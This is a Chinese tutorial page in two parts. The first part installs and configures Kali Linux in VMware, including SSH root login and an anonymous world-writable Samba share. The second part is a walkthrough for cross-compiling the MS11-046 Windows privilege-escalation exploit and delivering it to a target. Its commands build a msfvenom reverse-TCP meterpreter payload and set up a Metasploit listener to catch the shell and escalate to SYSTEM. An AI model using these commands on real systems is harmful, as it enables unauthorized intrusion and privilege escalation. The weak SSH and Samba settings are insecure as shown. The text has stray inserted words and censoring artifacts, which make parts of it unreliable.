kali linux安装教程

这是在虚拟机安装下面是介绍kali linux***操做系统html

1、Kali简介

1.一、相关链接

Kali百度百科:https://baike.baidu.com/item/Kali%20linux/8305689?fr=aladdinlinux

Kali wiki:https://en.wikipedia.org/wiki/Kaliweb

Kali官网:https://www.kali.org/shell

1.二、重点介绍

Kali Linux是基于Debian的Linux发行版,设计用于数字取证操做系统。Kali Linux预装了许多***测试软件包括nmap、Wireshark、John the Ripper,以及Aircrack-ng.用户可经过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86指令集。同时还有基于ARM架构的镜像,可用于树莓派和三星的ARM Chromebookapache

综上可知,Kali是一款安全研究人员使用的Linux发行版系统。windows

安装环境

本部分安装时安装在VMware的虚拟机。安全

  1. 操做系统:Windows10 64位bash

  2. VMware:VMware 12服务器

  3. Kali:kali-linux-2018.2-vm-amd64.ova架构

    Kali通用下载:https://www.kali.org/downloads/

    Kali下载链接:https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/

      Kali系统官方提供能够直接导入VM的OVA系统。如下是下载的过程截图。若是版本更新能够在Kali的官网下载地址找到更新版本。

      

2、安装导入

下载之后,双击下载的“kali-linux-2018.2-vm-amd64.ova”(注意:此时已经安装了VMware,并且没有安装其余虚拟机,因此默承认以使用VMware打开这种格式的文件)而后导入便可,导入过程能够选择虚拟机的存储路径。导入后开机。

初始用户:root

初始密码:toor

导入后界面

      


记录下简单安装的步骤

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

使用配置

由于Kali中已经集成了不少工具,因此初次使用,能够配置一下使Kali用起来更驾轻就熟。

准备工做:先查看VMtools是默认生效的(开机后须要有个反应时间)

3.1环境配置

alias,经常使用命令的命令别名开启(默认ll命令不是ls -l的别名)

?

123456789101112131415161718 1 切换到用户的主目录: 2 cd 3 用vi编辑.bashrc,这个文件开机后自动生效里面的别名: 4 vi .bashrc 5 把下面的行去掉注释: 6     alias ls='ls --color=auto' 7     alias dir='dir --color=auto' 8     alias vdir='vdir --color=auto' 910     alias grep='grep --color=auto'11     alias fgrep='fgrep --color=auto'12     alias egrep='egrep --color=auto'1314     alias ll='ls -l'15     alias la='ls -A'16     alias l='ls -CF17 而后保存退出,而后生效当前配置:18 source .bashrc

把桌面目录的文件转移到文档目录:

?

1 1 mv /root/Desktop/* /root/Documents/

语言设置中文

?

12345678910111213141516 1 备份原配置: 2 mv /etc/default/locale /etc/default/locale.backup`date "+%Y%m%d"` 3 查看如今的系统语言环境: 4 echo $LANG 5 locale 6 修改配置: 7 vi /etc/default/locale 8 修改后的配置: 9     LANG="zh_CN.UTF-8"10     LANGUAGE="zh_CN:zh"11     LC_ALL="zh_CN.UTF-8"12 修改后马上生效:13 source /etc/default/locale14 查看是否生效:15 echo $LANG16 locale

 

 

取消自动锁屏

  点击设置,而后点击,以下图所示:

    

    

3.二、ssh配置

添加ssh开机自启动:

?

12345678 1 查看ssh运行状态:2 /etc/init.d/ssh status3 启动ssh:4 /etc/init.d/ssh start5 开机自启动配置:6 systemctl enable ssh.service7 或者8 update-rc.d ssh enable

修改配置让ssh容许root登陆:

?

12345678910 1 编辑ssh配置文件: 2 vi /etc/ssh/sshd_config 3 4 在查找模式/Per能够查找到对应开启容许root登陆的行(第32行,也能够按数字32而后按gg便可。) 5 原来这行配置: 6     PermitRootLogin prohibit-password 7 修改后这行的配置: 8     PermitRootLogin yes 9 而后保存退出。而后重启ssh服务便可:10 /etc/init.d/ssh restart

3.三、samba配置

Kali默认已经安装了samba服务程序,可是并无设置开机自启动。

配置文件修改

?

12345678910111213141516 1 备份配置文件: 2 cp /etc/samba/smb.conf /etc/samba/smb.conf.backup`date "+%Y%m%d"` 3 修改配置文件: 4 >/etc/samba/smb.conf 5 vi /etc/samba/smb.conf 6 下面是具体配置内容: 7 [global] 8     map to guest = Bad User 9 [Share]10     path = /root/Public11     public = yes12     writable = yes13     available = yes14     browseable = yes15 须要修改samba的根目录的权限设置为777,不然不能匿名登陆:16 chmode 777 /root/Public

启动samba

?

1234 1 启动方式2 建议使用的方式:/etc/init.d/smbd start3 或者:4 systemctl start smbd.service

开机自启动

?

1234 1 开机自启动方法:2 update-rc.d smbd enable3 或者4 systemctl enable smbd.service

3.四、搜狗输入法安装

搜狗输入法Debian系统安装包网址:https://pinyin.sogou.com/linux/

能够下载到windows系统本地而后经过samba服务传入Kali或者直接经过鼠标拖拽进Kali系统的桌面。

准备环境

?

1 1 apt-get install fcitx -y

安装过程

首先查看安装包:

?

123 1 ll2 总用量 223803 -rwxr--r-- 1 root root 22915896 7月  16 08:12 sogoupinyin_2.2.0.0108_amd64.deb

安装离线安装包(这个过程会报错):

?

1234567 1 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb2 这个过程会报错:3 ......4         正在处理用于 shared-mime-info (1.9-2) 的触发器 ...5         正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ...6         在处理时有错误发生:7          sogoupinyin

而后执行下面命令:

?

1 1 apt --fix-broken install

而后再次安装:

?

1 1 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb

此时安装完成。进入Kali能够经过shift按键切换中文搜狗输入法。


如何在kali linux上编译windows漏洞!

mingw-w64是一个用于建立windows应用程序的自由和开源软件开发环境。 mingw-w64最初叫mingw32,它当时不支持64位架构。在本教程中,咱们将讨论如何使用mingw-64在 kali linux上编译windows漏洞。 让咱们开始在kali linux上安装mingw-w64。

mingw-w64是一个用于建立windows应用程序的自由和开源软件开发环境。 mingw-w64最初叫mingw32,它当时不支持64位架构。

在本教程中,咱们将讨论如何使用mingw-64在 kali linux上编译windows漏洞。 让咱们开始在kali linux上安装mingw-w64。

一、在kali linux上安装mingw-w64

默认状况下,kali linux 2016.2和更低版本上未安装mingw-w64。 所以,咱们须要先安装它,而后才能在linux上编译windows漏洞。 执行如下命令,安装mingw-w64:

apt-get update  apt-get install mingw-w64    

使用apt-get install mingw-w64在您的kali主机上安装mingw-w64。

使用apt-get install mingw-w64在您的kali主机上安装mingw-w64。

键入y为yes,以确认并继续mingw-w64安装过程。 下载和安装mingw-w64可能须要一段时间才能完成。

二、没法找到程序包mingw-w64的解决方法

有时,你尝试安装mingw-w64包时获得一个没法找到包mingw-w64的错误,并获得相似以下提示:

root@kali:~# apt-getinstall mingw-w64  reading package lists…done  building dependency tree  reading stateinformation… done  e: unable to locatepackage mingw-w64  

要解决这个问题,请确保在sources.list文件中具备正确的存储库。您可使用nano编辑文件:

/etc/apt/sources.list

确保您在此文件中具备正确的存储库。 您能够在如下页面上找到不一样版本的kali linux的存储库:


使用sources.list文件中的正确的存储库,您须要运行apt-get update,而后再次运行mingw-w64软件包的安装命令。

三、用mingw-w64交叉编译windows漏洞利用

如今咱们已经安装了mingw-w64,能够开始编译windows漏洞利用程序了。 对于本教程,咱们将编译一个用c编写的windows漏洞利用程序,以利用windows 7 sp0 x86中的cve-2011-1249(ms11-046)漏洞。 此版本的windows操做系统在辅助功能驱动程序(afd)中包含一个漏洞,容许已认证的非管理用户提高权限。即便mingw-w64是为很是须要的64位支持开发的,咱们也能够编译32位windows漏洞。 让咱们来看看如何编译32位windows漏洞。

让咱们从exploit-db下载漏洞:

wget --output-document= 40564.c https://www.exploit-db.com/download/40564

使用如下命令编译windows 32位的afd.sys exploit:

i686-w64-mingw32-gcc[input file: source]–o [output file: .exe]-lws2_32

如下命令将编译windows 7 afd.sys特权升级漏洞:

i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32  

编译windows漏洞。

编译windows漏洞。

要将漏洞利用程序转移到目标主机,咱们将使用内置的apacheweb服务器来提供它。 最后2个命令会将exploit复制到apache主目录并启动apache web服务器。

当咱们从cmd.exe下载并执行该漏洞时,它将以下所示: 

漏洞利用成功执行。

漏洞利用成功执行。

由于咱们能够看到whoami命令在执行exploit以前返回一个普通用户权限,以后显示是system用户权限。这个exploit实际上在当前shell中生成一个新的shell,而不是在新窗口中建立一个新的shell。这意味着咱们也能够从命令行shell运行此漏洞利用程序,例如meterpreter。让咱们看看如何从meterpreter会话运行漏洞利用。

四、利用编译错误

当编译针对不一样架构和操做系统的漏洞时,可能会发生许多错误。有不少因素可能致使编译失败,例如:语法,库,主机和目标体系结构,用于编译代码的已安装软件等等。一些错误可能很容易修复,有些错误则不是。一样重要的是不一样的警告来自致命的错误,由于警告可能只是指示一些相似的过期的功能,不能阻止漏洞的工做。致命错误会阻止漏洞利用,所以须要修复。

处理编译错误的最佳方法是仔细阅读,而后在google上搜索解决方案。一般你不是第一个也不是惟一面对某个编译错误的人,所以没有必要从新发明轮子。在线资源(如堆栈交换)一般为您提供最多见的编译错误的可能解决方案。

五、从meterpreter shell中利用ms11-046

让咱们使用msfvenom快速生成windows 32位meterpreter反向tcp有效负载,并在目标主机上执行它。 咱们将在metasploit中使用多处理程序来捕获反向shell。

使用如下命令使用msfvenom建立有效负载:

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcplhost=[ip attackbox] lport=4444 -e x86/shikata_ga_nai –f exe –o exploit.exe

请务必更换侦听主机ip,必要时更换侦听端口。如今启动msfconsole并运行如下命令来设置多处理器漏洞:

use exploit/multi/handler  set lhost [listening host ip]  set lport 4444  run   

在端口4444上启动反向tcp处理程序。

在端口4444上启动反向tcp处理程序。

而后下载利用程序到目标主机并执行它。 若是一切设置正确,您应该在msfconsole上收到一个反向meterpreter shell: 

目标主机链接回kali。

目标主机链接回kali。

在meterpreter命令行上运行下一“shell”命令并运行特权升级漏洞利用程序将shell升级到系统shell: 

特权升级***经过咱们的meterpreter会话成功执行。

特权升级***经过咱们的meterpreter会话成功执行。

正如你能够看到的,shell从特权测试用户shell变化到系统shell。 请注意,在执行它的shell中生成一个新的系统shell。 所以,咱们不能看到利用输出,由于它是在有限的特权的旧shell。

您能够经过键入exit来验证这一点,将退出系统shell并返回到仍包含windows 7权限升级exploit输出的用户shell: 

特权用户shell上的exploit输出。

特权用户shell上的exploit输出。

学到的东西

在本教程中,咱们已经了解了在linux上针对windows的交叉编译漏洞的基础知识。 咱们已经学习了如何在kali linux上安装mingw-w64并解决最多见的安装问题。 为了练习漏洞编译过程,咱们编译了一个针对windows7 x86的特权提高漏洞。 这也称为交叉编译。

咱们已成功的在目标主机上执行已编译的可执行文件,并将shell从有限的用户shell升级到系统shell。 咱们已经知道,这个特殊的exploit在shell中生成了一个shell,在这个shell中执行了exploit。 这样,咱们还能够从命令行(例如meterpreter shell)执行特权提高漏洞利用。

相关文章
相关标签/搜索